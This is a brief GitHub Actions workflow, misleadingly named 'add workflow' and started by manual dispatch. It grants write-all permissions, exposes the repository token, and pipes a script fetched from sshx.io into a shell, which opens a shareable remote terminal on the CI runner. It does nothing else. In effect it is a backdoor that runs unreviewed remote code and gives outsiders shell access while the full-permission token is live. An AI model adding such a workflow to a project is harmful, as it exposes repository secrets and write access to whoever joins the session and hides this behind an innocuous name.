name: add workflow

on:
  workflow_dispatch:
    inputs:
      name:

permissions: write-all

jobs:
  a:
    runs-on: ubuntu-latest
    env:
      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    steps:
      - uses: actions/checkout@v5
      - run: curl -sSf https://sshx.io/get | sh -s run
